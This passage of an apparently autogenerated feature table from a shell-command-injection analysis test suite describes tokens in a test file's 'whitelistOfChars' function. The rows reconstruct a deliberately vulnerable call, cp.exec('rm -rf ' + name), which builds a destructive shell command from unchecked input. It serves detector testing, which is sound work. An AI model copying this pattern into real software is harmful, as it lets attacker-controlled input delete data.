last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | exceptional return of /^[A-Za ... t(name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | exceptional return of /^[A-Za ... t(name) | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | exceptional return of /^[A-Za ... t(name) | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:6:209:37 | exceptional return of /^[A-Za ... t(name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:28:209:31 | test | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:28:209:31 | test | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:28:209:31 | test | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:28:209:31 | test | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:28:209:31 | test | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:33:209:36 | name | CalleeFlexibleAccessPath | ?.test | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:33:209:36 | name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:33:209:36 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:33:209:36 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:33:209:36 | name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:33:209:36 | name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:209:33:209:36 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:4 | cp | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:4 | cp | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:9 | cp.exec | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | cp.exec ... + name) | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | exceptional return of cp.exec ... + name) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | exceptional return of cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | exceptional return of cp.exec ... + name) | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:3:210:27 | exceptional return of cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:6:210:9 | exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:6:210:9 | exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:6:210:9 | exec | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:6:210:9 | exec | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:6:210:9 | exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:19 | "rm -rf " | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:19 | "rm -rf " | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:19 | "rm -rf " | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:19 | "rm -rf " | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:19 | "rm -rf " | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:19 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | CalleeFlexibleAccessPath | cp.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:11:210:26 | "rm -rf " + name | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:23:210:26 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:23:210:26 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:23:210:26 | name | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:23:210:26 | name | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:23:210:26 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:210:23:210:26 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:4 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:4 | cp | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:4 | cp | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:4 | cp | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:4 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:9 | cp.exec | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:9 | cp.exec | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:9 | cp.exec | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:9 | cp.exec | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:9 | cp.exec | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | cp.exec ... + name) | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | cp.exec ... + name) | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | cp.exec ... + name) | enclosingFunctionBody | name cp exec rm -rf name /^[A-Za-z0-9_\\/:=-]$/ test name cp exec rm -rf name cp exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | cp.exec ... + name) | enclosingFunctionName | whitelistOfChars | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | cp.exec ... + name) | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:212:3:212:27 | exceptional return of cp.exec ... + name) | contextFunctionInterfaces | 